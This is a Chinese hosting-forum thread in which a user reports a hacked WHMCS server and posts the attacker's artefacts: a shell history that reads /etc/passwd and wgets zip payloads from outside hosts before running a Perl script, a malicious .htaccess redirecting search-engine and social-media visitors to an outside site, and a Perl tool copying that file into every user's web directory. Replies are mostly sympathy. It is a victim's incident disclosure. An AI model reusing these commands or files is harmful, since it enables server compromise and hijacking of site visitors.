设为首页收藏本站
切换到宽版

全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

全球主机交流论坛»论坛 主机综合交流 美国VPS综合讨论 中招了,whmcs被黑
CeraNetworks网络延迟测速工具IP归属甄别会员请立即修改密码
123下一页
返回列表 发新帖
查看: 4791|回复: 29
打印 上一主题 下一主题

[Windows VPS] 中招了,whmcs被黑

[复制链接]
老T
跳转到指定楼层
1#
发表于 2012-1-8 20:49:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
本帖最后由 老T 于 2012-1-8 21:06 编辑
  1.   124  id
  2.   125  ls /etc/valiases
  3.   126  chomd 777 valiases
  4.   127  pwd
  5.   128  cd /home2/multi/public_html/
  6.   129  cd..
  7.   130  cat /etc/passwd
  8.   131  root:x:0:0:root:/root:/bin/bash
  9.   132  bin:x:1:1:bin:/bin:/sbin/nologin
  10.   133  daemon:x:2:2:daemon:/sbin:/sbin/nologin
  11.   134  adm:x:3:4:adm:/var/adm:/sbin/nologin
  12.   135  lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
  13.   136  sync:x:5:0:sync:/sbin:/bin/sync
  14.   137  shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
  15.   138  halt:x:7:0:halt:/sbin:/sbin/halt
  16.   139  mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
  17.   140  uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
  18.   141  operator:x:11:0:operator:/root:/sbin/nologin
  19.   142  games:x:12:100:games:/usr/games:/sbin/nologin
  20.   143  gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
  21.   144  ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
  22.   145  nobody:x:99:99:Nobody:/:/sbin/nologin
  23.   146  vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
  24.   147  sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
  25.   148  ntp:x:38:38::/etc/ntp:/sbin/nologin
  26.   149  mysql:x:500:500::/home/mysql:/sbin/nologin
  27.   150  www:x:501:501::/home/www:/sbin/nologin
  28.   151  saslauth:x:499:499:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
  29.   152  mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
  30.   153  smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
  31.   154  root:x:0:0:root:/root:/bin/bash
  32.   155  bin:x:1:1:bin:/bin:/sbin/nologin
  33.   156  daemon:x:2:2:daemon:/sbin:/sbin/nologin
  34.   157  adm:x:3:4:adm:/var/adm:/sbin/nologin
  35.   158  lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
  36.   159  sync:x:5:0:sync:/sbin:/bin/sync
  37.   160  shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
  38.   161  halt:x:7:0:halt:/sbin:/sbin/halt
  39.   162  mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
  40.   163  uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
  41.   164  operator:x:11:0:operator:/root:/sbin/nologin
  42.   165  games:x:12:100:games:/usr/games:/sbin/nologin
  43.   166  gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
  44.   167  ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
  45.   168  nobody:x:99:99:Nobody:/:/sbin/nologin
  46.   169  vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
  47.   170  sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
  48.   171  ntp:x:38:38::/etc/ntp:/sbin/nologin
  49.   172  mysql:x:500:500::/home/mysql:/sbin/nologin
  50.   173  www:x:501:501::/home/www:/sbin/nologin
  51.   174  saslauth:x:499:499:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
  52.   175  mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
  53.   176  smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
  54.   177  wget http://www.undp.org.sz/images/M_images/0.zip
  55.   178  unzip 0.zip
  56.   179  wget http://www.floraria-ariana.ro//tmp/htaccess.zip
  57.   180  wget http://www.floraria-ariana.ro//htaccess.zip
  58.   181  unzip htaccess.zip
  59.   182  perl 0.pl
  60.   183  pwd
  61.   184  cd /home/
  62.   185  ls
  63.   186  cd www
  64.   187  ls
  65.   188  cd ..
  66.   189  cd wwwroot
  67.   190  ls
  68.   191  cd xxx.xxx.xx
  69.   192  wget http://www.smiv.com.ve/logs/pic.zip
  70.   193  unzip pic.zip
复制代码
  1. RewriteEngine On
  2. RewriteCond %{HTTP_REFERER} .*google.* [OR]
  3. RewriteCond %{HTTP_REFERER} .*ask.* [OR]
  4. RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
  5. RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
  6. RewriteCond %{HTTP_REFERER} .*有图比.* [OR]
  7. RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
  8. RewriteCond %{HTTP_REFERER} .*qq.* [OR]
  9. RewriteCond %{HTTP_REFERER} .*excite.* [OR]
  10. RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
  11. RewriteCond %{HTTP_REFERER} .*msn.* [OR]
  12. RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
  13. RewriteCond %{HTTP_REFERER} .*aol.* [OR]
  14. RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
  15. RewriteCond %{HTTP_REFERER} .*goto.* [OR]
  16. RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
  17. RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
  18. RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
  19. RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
  20. RewriteCond %{HTTP_REFERER} .*search.* [OR]
  21. RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
  22. RewriteCond %{HTTP_REFERER} .*bing.* [OR]
  23. RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
  24. RewriteCond %{HTTP_REFERER} .*FB.* [OR]
  25. RewriteCond %{HTTP_REFERER} .*推特.* [OR]
  26. RewriteCond %{HTTP_REFERER} .*blog.* [OR]
  27. RewriteCond %{HTTP_REFERER} .*live.* [OR]
  28. RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
  29. RewriteCond %{HTTP_REFERER} .*mail.* [OR]
  30. RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
  31. RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
  32. RewriteCond %{HTTP_REFERER} .*ya.* [OR]
  33. RewriteCond %{HTTP_REFERER} .*aport.* [OR]
  34. RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
  35. RewriteCond %{HTTP_REFERER} .*flickr.*
  36. RewriteRule ^(.*)$ http://ulitka.kh.ua/vb/showthread.php [R=permanent,L]
复制代码
  1. #!/usr/bin/perl
  2. # Exploit tool v1.0 Coded L3y Black Dream(Modify By s3f4)
  3. # Valid Exploits For Linux Servers ...
  4. # [ LocalKernel.Com ]
  5. # Let's Start ...
  6. {
  7. system("cp .htaccess  /home/daemon/public_html/.htaccess");
  8. system("cp .htaccess  /home/adm/public_html/.htaccess");
  9. system("cp .htaccess  /home/lp/public_html/.htaccess");
  10. system("cp .htaccess  /home/sync/public_html/.htaccess");
  11. system("cp .htaccess  /home/shutdown/public_html/.htaccess");
  12. system("cp .htaccess  /home/halt/public_html/.htaccess");
  13. system("cp .htaccess  /home/mail/public_html/.htaccess");
  14. system("cp .htaccess  /home/uucp/public_html/.htaccess");
  15. system("cp .htaccess  /home/operator/public_html/.htaccess");
  16. system("cp .htaccess  /home/games/public_html/.htaccess");
  17. system("cp .htaccess  /home/gopher/public_html/.htaccess");
  18. system("cp .htaccess  /home/ftp/public_html/.htaccess");
  19. system("cp .htaccess  /home/nobody/public_html/.htaccess");
  20. system("cp .htaccess  /home/vcsa/public_html/.htaccess");
  21. system("cp .htaccess  /home/sshd/public_html/.htaccess");
  22. system("cp .htaccess  /home/ntp/public_html/.htaccess");
  23. system("cp .htaccess  /home/mysql/public_html/.htaccess");
  24. system("cp .htaccess  /home/www/public_html/.htaccess");
  25. system("cp .htaccess  /home/saslauth/public_html/.htaccess");
  26. system("cp .htaccess  /home/mailnull/public_html/.htaccess");
  27. system("cp .htaccess  /home/smmsp/public_html/.htaccess");
  28. print "[ sefa [AT] google [DOT] tk ^ LocalKernel.Com]";
  29. }
复制代码
回复

举报

汉陈帝国
2#
发表于 2012-1-8 20:49:50 | 只看该作者
恭喜
回复 支持 反对

举报

我是马甲撒
3#
发表于 2012-1-8 20:49:54 | 只看该作者
同情,悲催
回复 支持 反对

举报

whhuazi
4#
发表于 2012-1-8 20:49:56 | 只看该作者
提示: 作者被禁止或删除 内容自动屏蔽
回复 支持 反对

举报

lazyzhu
5#
发表于 2012-1-8 20:50:22 | 只看该作者
楼主,赶紧~
回复 支持 反对

举报

oldghost
6#
发表于 2012-1-8 20:50:27 | 只看该作者
同情
回复 支持 反对

举报

master
7#
发表于 2012-1-8 20:50:35 | 只看该作者
杯具
回复 支持 反对

举报

Kvm
8#
发表于 2012-1-8 20:50:41 | 只看该作者
回复 支持 反对

举报

bearqq
9#
发表于 2012-1-8 20:59:06 | 只看该作者
wget http://www.smiv.com.ve/logs/pic.zip
我是不是知道得太多了
回复 支持 反对

举报

ebizhost
10#
发表于 2012-1-8 21:00:51 | 只看该作者
bearqq 发表于 2012-1-8 13:59
wget http://www.smiv.com.ve/logs/pic.zip
我是不是知道得太多了

绝对是
回复 支持 反对

举报

下一页 »
123下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2025-11-7 00:57 , Processed in 0.228351 second(s), 10 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表